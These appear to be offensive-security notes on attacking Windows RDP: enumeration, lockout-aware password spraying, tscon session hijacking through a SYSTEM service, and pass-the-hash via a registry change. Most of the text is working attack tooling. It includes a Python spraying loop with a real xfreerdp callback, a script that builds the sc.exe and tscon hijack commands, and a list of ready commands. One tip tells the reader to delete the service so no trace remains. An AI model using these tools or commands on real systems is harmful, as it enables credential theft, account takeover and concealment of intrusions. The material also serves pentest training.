Attacking RDP
Remote Desktop Protocol (RDP) is a Microsoft protocol that lets you remotely connect to a computer with a graphical interface over a network. It’s widely used by admins to manage systems centrally and by managed service providers (MSPs) to handle client networks. That popularity, plus the fact that it is usually exposed with only a username and password in front of it, makes it a prime target for attackers.
Step 1: Enumeration
RDP runs on TCP/3389 by default. We use Nmap to check if this port is open and an RDP service is active. If it’s open, we’ve got a potential entry point.
Common Attack: Password Guessing
RDP requires a username and password. Misconfigurations might leave it password-less (rare but possible). The go-to attack is password guessing, but Windows often locks accounts after too many failed attempts (Account Lockout).
To avoid this, we use Password Spraying: Try one password across multiple usernames, then switch passwords, staying under the lockout threshold.
Tools for Password Attacks:
Crowbar: Takes a list of usernames and one password, tests them against RDP, and flags any successful logins.
Hydra: Similar idea—tries a single password across many usernames to find valid credentials.
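Added example, not part of the original notes: a lockout-aware spray loop with the same "one password across all users per round" shape described above for crowbar and hydra, exercised offline against a constructed RDP target that enforces an account-lockout policy. The policy values (3 bad passwords lock the account, 30-minute observation window), the user and password lists and the valid credentials are all constructed; the `xfreerdp_login` callback assumes FreeRDP 2.x and its `+auth-only` flag and is not run in the demo.

```python
"""Lockout-aware password spraying, demonstrated against a simulated target."""
import subprocess
import time
from collections import defaultdict, deque


class FakeClock:
    """Constructed clock so the demo runs instantly: sleep() just advances time."""
    def __init__(self):
        self.t = 0.0
    def now(self):
        return self.t
    def sleep(self, seconds):
        self.t += seconds


class SimulatedRdpTarget:
    """Constructed stand-in for the domain lockout policy the RDP server enforces:
    `threshold` failures inside `window` seconds locks the account."""
    def __init__(self, creds, threshold, window, now):
        self.creds = creds                    # {user: password}, constructed test data
        self.threshold = threshold
        self.window = window
        self.now = now
        self.failures = defaultdict(deque)    # user -> failure timestamps still in window
        self.locked = set()

    def login(self, user, password):
        t = self.now()
        q = self.failures[user]
        while q and t - q[0] >= self.window:
            q.popleft()                       # bad-password counter resets after the window
        if user in self.locked:
            return False                      # locked accounts reject even the right password
        if self.creds.get(user) == password:
            q.clear()
            return True
        q.append(t)
        if len(q) >= self.threshold:
            self.locked.add(user)
        return False


def spray(users, passwords, login, threshold, window, now=time.monotonic,
          sleep=time.sleep, pace=True):
    """One password against every user per round. Each round costs every
    still-unknown account one bad-password count, so only threshold-1 rounds
    fit inside one observation window; with pace=True we wait until the
    oldest round has aged out of the window before starting another."""
    found = {}
    remaining = list(users)
    round_ends = deque()                      # end times of rounds still inside the window
    for password in passwords:
        t = now()
        while round_ends and t - round_ends[0] >= window:
            round_ends.popleft()
        while pace and len(round_ends) >= threshold - 1:
            sleep(max(0.0, round_ends[0] + window - now()))
            t = now()
            while round_ends and t - round_ends[0] >= window:
                round_ends.popleft()
        for user in list(remaining):
            if login(user, password):
                found[user] = password
                remaining.remove(user)
        round_ends.append(now())
        if not remaining:
            break
    return found


def xfreerdp_login(host):
    """Real-world callback (assumption: FreeRDP 2.x, whose +auth-only flag
    authenticates without opening a desktop). Not exercised in the demo."""
    def attempt(user, password):
        r = subprocess.run(["xfreerdp", f"/v:{host}", f"/u:{user}", f"/p:{password}",
                            "/cert:ignore", "+auth-only"],
                           capture_output=True, timeout=30)
        return r.returncode == 0
    return attempt


# Constructed inputs for the offline demo.
USERS = ["administrator", "jdoe", "svc_backup", "rdpuser"]
PASSWORDS = ["Welcome1", "Summer2024!", "Winter2024!", "Password1"]
CREDS = {"svc_backup": "Winter2024!", "rdpuser": "Password1"}


def demo(pace=True, threshold=3, window=1800):
    """Returns (credentials found, accounts locked, seconds elapsed)."""
    clock = FakeClock()
    target = SimulatedRdpTarget(CREDS, threshold, window, clock.now)
    found = spray(USERS, PASSWORDS, target.login, threshold, window,
                  now=clock.now, sleep=clock.sleep, pace=pace)
    return found, sorted(target.locked), clock.t


if __name__ == "__main__":
    print(demo(pace=True))     # paced: both accounts found, nothing locked
    print(demo(pace=False))    # unpaced: three accounts locked during round 3
```

Read the real threshold and reset window with `net accounts /domain` before spraying; the paced run above finds both planted credentials without a single lockout, while the unpaced run locks three of the four accounts in the third round, including one whose password was in the list.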
Once You Have Credentials:
Use tools like rdesktop or xfreerdp to log into the RDP server with the valid username and password, giving you a graphical interface to explore.
Advanced Attack: Session Hijacking
If you gain access to a machine with a local admin account and another user is logged in via RDP, you can hijack their session—impersonate them without their password.
How?
Use tscon.exe (a built-in Microsoft tool) to attach their session ID to your own session name (tscon <target ID> /dest:<your session name>). Without the target’s password this only works when tscon runs as SYSTEM.
If you only have local admin rights, create a service with sc.exe whose binary path runs tscon; services start as SYSTEM, so starting the service performs the hijack.
If the hijacked user is a Domain Admin, you’ve hit the jackpot—full network control.
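Added example, not part of the original notes: parse the output of query user, list the sessions that can be taken over, and build the sc.exe service and tscon commands described above for a chosen target. The query user sample is constructed (user names, session names, IDs and times are made up); on the target, feed in the real text from query user. Note that /dest: is your own session name, i.e. where the hijacked desktop is displayed, not the victim’s.

```python
"""Pick a hijack target from `query user` output and build the tscon service commands."""
import re

# Constructed sample of `query user` output. ">" marks our own session; the
# disconnected session has an empty SESSIONNAME column.
QUERY_USER_SAMPLE = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>pentester             rdp-tcp#13          2  Active          .  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          4  Active         12  8/25/2021 1:28 AM
 backupadmin                               1  Disc         none  8/25/2021 1:10 AM
"""

LINE_RE = re.compile(
    r"^(?P<current>>?)\s*(?P<user>\S+)\s+"
    r"(?:(?P<session>\S+)\s+)?"          # blank for disconnected sessions
    r"(?P<id>\d+)\s+(?P<state>\S+)\s+(?P<idle>\S+)\s+(?P<logon>.+?)\s*$"
)


def parse_query_user(text):
    """Return one dict per session line; the header and blank lines are skipped."""
    sessions = []
    for line in text.splitlines():
        if not line.strip() or line.split()[0] == "USERNAME":
            continue
        m = LINE_RE.match(line)
        if not m:
            continue                     # unexpected layout: skip rather than guess
        d = m.groupdict()
        sessions.append({
            "current": d["current"] == ">",
            "user": d["user"],
            "session": d["session"] or "",
            "id": int(d["id"]),
            "state": d["state"],
            "idle": d["idle"],
            "logon": d["logon"],
        })
    return sessions


def candidate_targets(sessions):
    """Every session that is not ours; Active and Disc sessions can both be attached."""
    return [s for s in sessions if not s["current"]]


def hijack_commands(sessions, target_user, service_name="sessionhijack"):
    """Commands to run from a local-admin shell: the service starts as SYSTEM
    and runs tscon, which attaches the target's session ID to OUR session name."""
    me = next(s for s in sessions if s["current"])
    target = next(s for s in sessions if s["user"].lower() == target_user.lower())
    if target["id"] == me["id"]:
        raise ValueError("refusing to hijack our own session")
    tscon = f"tscon {target['id']} /dest:{me['session']}"
    return [
        f'sc.exe create {service_name} binpath= "cmd.exe /k {tscon}"',
        f"net start {service_name}",
    ]


if __name__ == "__main__":
    sessions = parse_query_user(QUERY_USER_SAMPLE)
    for s in candidate_targets(sessions):
        print(f"{s['user']:<14} id={s['id']} state={s['state']}")
    print("\n".join(hijack_commands(sessions, "lewen")))
```

The service name is arbitrary; remove it afterwards with sc.exe delete <name> so the artefact does not stay on the host.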
Pass-the-Hash (PtH) Attack:
If you have a user’s NTLM hash (e.g., from a credential dump) but can’t crack it to a plaintext password, you can still use it to access RDP.
How?
The target needs Restricted Admin Mode enabled, which isn’t the default. It is controlled by the DisableRestrictedAdmin value under HKLM\System\CurrentControlSet\Control\Lsa: 0 enables the mode, 1 (or the value being absent) keeps it disabled. Changing it requires admin rights on the target, so this is for regaining or extending access with a hash, not for initial entry.
Then use xfreerdp with the hash (/pth:) to log in, gaining GUI access.
Note: Restricted Admin Mode PtH works wherever the key is set, but the tscon session hijacking above no longer works on Windows Server 2019. PtH over RDP is still worth a shot whenever GUI access is needed and only a hash is available.
Steps:
Enumeration:
Port: TCP/3389.
Tool: Nmap to confirm RDP is running.
Password Attacks:
Method: Password Spraying (one password, many usernames).
Goal: Find valid credentials without triggering lockout.
Session Hijacking:
Requirement: Local admin (escalated to SYSTEM via a service) and another user’s active or disconnected session.
Goal: Impersonate an active RDP user (e.g., Domain Admin).
Pass-the-Hash (PtH):
Requirement: NTLM hash + Restricted Admin Mode enabled on the target (DisableRestrictedAdmin = 0; setting it needs admin on the host).
Goal: RDP access without plaintext password.
Tools & Commands (each command followed by what it does):
nmap -Pn -p3389 -sV <IP>
Scans TCP/3389 and fingerprints the RDP service.
crowbar -b rdp -s <IP>/32 -U <file> -c <pass>
Password sprays RDP with a username list and a single password (crowbar expects the target in CIDR form).
hydra -L <file> -p <pass> <IP> rdp
Same as Crowbar: tests one password (lowercase -p) across a username list (-L).
rdesktop -u <user> -p <pass> <IP>
Logs into RDP with valid credentials (xfreerdp /v:<IP> /u:<user> /p:<pass> does the same).
query user
Lists sessions on the host (ID, username, session name, state); ">" marks your own session.
sc.exe create <name> binpath= "cmd.exe /k tscon <ID> /dest:<your session name>"
Creates a service that runs tscon as SYSTEM; <ID> is the target session, /dest: is your own session name.
net start <name>
Starts the service, which performs the hijack.
tscon <ID> /dest:<your session name>
Attaches another session to yours directly (only works without a password when run as SYSTEM).
reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin
Checks whether Restricted Admin Mode is enabled (value 0) or disabled (1 or missing).
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Enables Restricted Admin Mode for PtH (requires admin on the host).
xfreerdp /v:<IP> /u:<user> /pth:<hash>
Logs into RDP using an NTLM hash.
Quick Tips:
Start with Nmap: Verify RDP is active.
Spray Smart: Avoid lockouts with Password Spraying.
Hijack Opportunity: Look for active sessions with query user.
PtH Check: Query DisableRestrictedAdmin first; if it is 1 or missing and you already have admin on the host, set it to 0 before trying /pth.